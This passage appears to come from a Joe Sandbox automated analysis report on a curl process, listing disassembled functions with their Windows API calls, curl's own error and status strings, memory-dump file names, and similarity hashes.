Instruction Fuzzy Hash: DF31CB32A05B81C2EB409F26E44439C3BA1F344BA8F580279CB6A4B3C5EF78C656C311

Function 000000013F3232F4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 000000013F323342
WSAGetLastError.WS2_32 ref: 000000013F32334C

Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31E9E3
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9EB
Part of subcall function 000000013F31E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9FB
Part of subcall function 000000013F31E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EA05
Part of subcall function 000000013F31E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31EA18
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAA8
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAB3
Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EABC
Part of subcall function 000000013F31E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F323387
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F32338F

Strings

getsockname() failed with errno %d: %s, xrefs: 000000013F323366
ssloc inet_ntop() failed with errno %d: %s, xrefs: 000000013F3233AA

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetsocknamestrncpy
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2903212608-2605427207
Opcode ID: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction ID: 5a7ffa73f407e5c129f1035b287ab5356c981fadb7352c463b9fe2a3c81f734d
Opcode Fuzzy Hash: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction Fuzzy Hash: 01214D36B15690D6FA60AB26E4457DA7361BB89BC4F844039DE4D0774ADF2CD74ACB00

Function 000000013F32320C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 000000013F323256
WSAGetLastError.WS2_32 ref: 000000013F323260

Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31E9E3
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9EB
Part of subcall function 000000013F31E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31E9FB
Part of subcall function 000000013F31E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EA05
Part of subcall function 000000013F31E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31EA18
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAA8
Part of subcall function 000000013F31E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EAB3
Part of subcall function 000000013F31E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EABC
Part of subcall function 000000013F31E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F3232A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F3232A9

Strings

ssrem inet_ntop() failed with errno %d: %s, xrefs: 000000013F3232C4
getpeername() failed with errno %d: %s, xrefs: 000000013F32327A

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetpeernamestrncpy
String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1595226642-4047410615
Opcode ID: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction ID: 94e53f6806305d314a6af4f7cd451551cc6e2d9654884d5e384703d188957c57
Opcode Fuzzy Hash: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction Fuzzy Hash: F0216036B15681D2FB60AB61E4447DA7361FB89B84F804039EA4D07759DF2CD74ACB40

Function 000000013F303344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 000000013F3033B6
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F3033C5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3033D4
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F3033E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3033F8

Strings

curl-ca-bundle.crt, xrefs: 000000013F303396

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _strdupfree$PathSearch
String ID: curl-ca-bundle.crt
API String ID: 4109318298-694051528
Opcode ID: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
Instruction ID: 9f316032746b06db6f2199b302c0754dba217c78ba5c34ded1b8b21d57a3e9af
Opcode Fuzzy Hash: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
Instruction Fuzzy Hash: 1E216D32705B80D2EA25CB61F8983DA77A4F789B80F44013ADA8D8BB55DF38CA56C744

Function 000000013F325E88 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 49COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F325F49

Strings

#HttpOnly_, xrefs: 000000013F325F13
unknown, xrefs: 000000013F325EAC
FALSE, xrefs: 000000013F325EF6
%s%s%s%s%s%s%I64d%s%s, xrefs: 000000013F325F38
TRUE, xrefs: 000000013F325EEA

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
API String ID: 1992661772-3622669638
Opcode ID: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction ID: c57fdeb809775c0555bd690275396afc4623bbe6de586c4a610eb7e71ce097cf
Opcode Fuzzy Hash: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction Fuzzy Hash: E4216A76A19B8491EB91DF14E9843C877F0F348B98F98012ADA8C03765DF3CCA9AC740

Function 000000013F329118 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F329153

Strings

all_proxy, xrefs: 000000013F3291F2
Uses proxy env variable %s == '%s', xrefs: 000000013F329223
http_proxy, xrefs: 000000013F32919A
ALL_PROXY, xrefs: 000000013F329209
_proxy, xrefs: 000000013F329167

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: tolower
String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
API String ID: 3025214199-127164392
Opcode ID: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction ID: e572676159ebbaebd5c70630245217a8399aacc06c82f0c59599f8d9c47fb892
Opcode Fuzzy Hash: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction Fuzzy Hash: D931AD36A0978494FB61DB12E5513ED77A4BB59B84F88413ADA8C0774AEF2CC30BC700

Function 000000013F323614 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

Failed to connect to %s port %u after %I64d ms: %s, xrefs: 000000013F323A8F
Connection timeout after %ld ms, xrefs: 000000013F32392C
After %I64dms connect time, move on!, xrefs: 000000013F32373C
connect to %s port %u failed: %s, xrefs: 000000013F32384B

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID:
String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$connect to %s port %u failed: %s
API String ID: 0-554012191
Opcode ID: 498c42fd69f1ea38a6445b90a59fb3a6e797bbdec9742f269396aa95173662d5
Instruction ID: a04e3a56611c75416d78899e9d4b3c9797cfec21cad6977b3bb02b8318ad6e5e
Opcode Fuzzy Hash: 498c42fd69f1ea38a6445b90a59fb3a6e797bbdec9742f269396aa95173662d5
Instruction Fuzzy Hash: 48D1E476A04BC0A1EB20DF29D4447EE6760F785BA8F045339EEA9477DADB78C642C701

Function 000000013F30EDEC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F313014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,000000013F3010B6), ref: 000000013F313026

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F30F57E), ref: 000000013F30EE38

Part of subcall function 000000013F31A914: WSACreateEvent.WS2_32(?,?,?,?,00000000,00000000), ref: 000000013F31AA20

__swprintf_l.LIBCMT ref: 000000013F30EF8F

Strings

Transfer aborted due to critical error in another transfer, xrefs: 000000013F30EF88

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: CounterCreateEventPerformanceQuery__swprintf_l_time64
String ID: Transfer aborted due to critical error in another transfer
API String ID: 471582966-1939301410
Opcode ID: 5b4aff65e33d0b5af15d2ecc1ec42f03042820f4ec29fe80a39ada0b03b81e87
Instruction ID: b8de3c796df932f76ee28def013d558f99f22c5254bbaa9afb856f6149dd1717
Opcode Fuzzy Hash: 5b4aff65e33d0b5af15d2ecc1ec42f03042820f4ec29fe80a39ada0b03b81e87
Instruction Fuzzy Hash: 32B19D72B056918AFB54DB76A4403ED2BF1F749B88F08053ADE4A53B99DB78C686C304

Function 000000013F34BA58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 177COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F34BC2F

Strings

%sAuthorization: Negotiate %s, xrefs: 000000013F34BC28
Proxy-, xrefs: 000000013F34BC11
Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 000000013F34BB59
Negotiate, xrefs: 000000013F34BA67, 000000013F34BB85

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
API String ID: 1992661772-1255959952
Opcode ID: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction ID: 82d6ab106df4f467eccbe357cd3a694f16e23df6653df320f5c1067f177af26f
Opcode Fuzzy Hash: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction Fuzzy Hash: 1C61AE3AA486C48AFA18CF21D5A53E97794F302B88F040639CA6A57791CB7EC64BC704

Function 000000013F318B60 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F303E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303E89

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,00000000,?,000000013F3196CD), ref: 000000013F318C51
__swprintf_l.LIBCMT ref: 000000013F318C84

Strings

%*[^]]%c%n, xrefs: 000000013F318BC5
%ld, xrefs: 000000013F318C6C
[%*45[0123456789abcdefABCDEF:.]%c%n, xrefs: 000000013F318B8D

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __stdio_common_vsscanf__swprintf_lstrtol
String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n
API String ID: 1923824951-723072255
Opcode ID: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction ID: f1d1ad6d57f6a30f4e21f5ff7516778a5d0fa9bf96308fd83c5e9d2e70299dfc
Opcode Fuzzy Hash: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction Fuzzy Hash: 5D416A72F05A8089FB61AB78D9803E877B0F745788F58443ADE4A57785DA3CC647C309

Function 000000013F301ED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F301F2F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000000013F301F7D
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 000000013F301F91

Strings

O, xrefs: 000000013F301FB5
COLUMNS, xrefs: 000000013F301F0D

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: BufferConsoleHandleInfoScreenstrtol
String ID: COLUMNS$O
API String ID: 283564500-2358961116
Opcode ID: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction ID: 4cf7effa57e5d72ce3c37727dd79a27b83b473fb3d9770a2ccdf3128aab84548
Opcode Fuzzy Hash: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction Fuzzy Hash: 96318272A0474186EB649F34E4453A973E0F784BA4F54033AEA6E477D4DB3CCA92C780

Function 000000013F310E0C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F310EAA

Strings

%2I64d:%02I64d:%02I64d, xrefs: 000000013F310E99
%3I64dd %02I64dh, xrefs: 000000013F310EE8
%7I64dd, xrefs: 000000013F310F11

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 1488884202-564197712
Opcode ID: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction ID: f3a6f2aa6ec5593e2dda6730cfa3dae840cfe2c7d7cbe5397acba56566c10e39
Opcode Fuzzy Hash: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction Fuzzy Hash: E821E9F5F01BC947DE2897A9AC12BC452A9B3D9BD0F94D136EC4C1B7A1E66C5347C201

Function 000000013F3362A8 Relevance: 7.7, APIs: 5, Instructions: 240networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32 ref: 000000013F336499
select.WS2_32 ref: 000000013F336538
__WSAFDIsSet.WS2_32 ref: 000000013F33657B
__WSAFDIsSet.WS2_32 ref: 000000013F3365AF
__WSAFDIsSet.WS2_32 ref: 000000013F3365D1

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction ID: 2891f7fb949fd89bcec9bfd981aada3e56c0d51ba260a1271f7835d3cc54b6e5
Opcode Fuzzy Hash: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction Fuzzy Hash: 1E91FB32F546908AFBA9CF24D414BE962A4FB40BA8F14533EDA66477D4DB38CB56C300

Function 000000013F3126E4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3128AC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F3128DD

Strings

unmatched close brace/bracket, xrefs: 000000013F3129AD
too many globs, xrefs: 000000013F3129C9
out of memory, xrefs: 000000013F3128C3

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: malloc
String ID: out of memory$too many globs$unmatched close brace/bracket
API String ID: 2803490479-3324938048
Opcode ID: 7103fd6da3cd217828e071422216ff0b3568705547e3e87d28e13c3ea1abe095
Instruction ID: 1840145920472dc2755802b3c8475bd8a0ef6b8378394f8f241525d5d28a842c
Opcode Fuzzy Hash: 7103fd6da3cd217828e071422216ff0b3568705547e3e87d28e13c3ea1abe095
Instruction Fuzzy Hash: 9191AD32A08B84CAFB519F25E8503EE7BB0F745B98F144429DE8A07795DF38C666C740

Function 000000013F31AE78 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F31B021
__swprintf_l.LIBCMT ref: 000000013F31B168

Part of subcall function 000000013F32EFB0: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,000000013F31AED4), ref: 000000013F32EFE3
Part of subcall function 000000013F32EFB0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F32EFEE

Strings

Connection #%ld to host %s left intact, xrefs: 000000013F31B14F
Connection cache is full, closing the oldest one, xrefs: 000000013F31B1C7

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: CloseHandleObjectSingleWait__swprintf_l_time64
String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one
API String ID: 2773606893-1048602531
Opcode ID: 432352585140fa902e4db93c5e23cc558f6be77b48866f189e77ede509ee8192
Instruction ID: 7caafda0d8c498693e158f7a5b4edd6576e5bb787c85d7c0003e0f3c4a931e8d
Opcode Fuzzy Hash: 432352585140fa902e4db93c5e23cc558f6be77b48866f189e77ede509ee8192
Instruction Fuzzy Hash: 1AB18A32A0168092FB64FF25E8503ED23B0F789B89F08513ADE1A1B395DF38D666C750

Function 000000013F332200 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32 ref: 000000013F3324D6
setsockopt.WS2_32 ref: 000000013F3324FE

Strings

We are completely uploaded and fine, xrefs: 000000013F3325A4
Failed to alloc scratch buffer, xrefs: 000000013F3323A6

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
API String ID: 1903391676-2419666956
Opcode ID: 35fd0e26329c2e5d6be6f503f0ccff65e94623c70a3b2047a20998440881e4e9
Instruction ID: e728e63ce7258257147a2b4a91ee57b4408de7b2fcf8ff578a0a3a242c084e97
Opcode Fuzzy Hash: 35fd0e26329c2e5d6be6f503f0ccff65e94623c70a3b2047a20998440881e4e9
Instruction Fuzzy Hash: 72B1AD32B09BC4A6FA69CF21DA403E9B7A4F749B94F44413ADB6907791DB38D272C700

Function 000000013F336B98 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213COMMON

Download Yara Rule

APIs

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000000013F336EC2

Strings

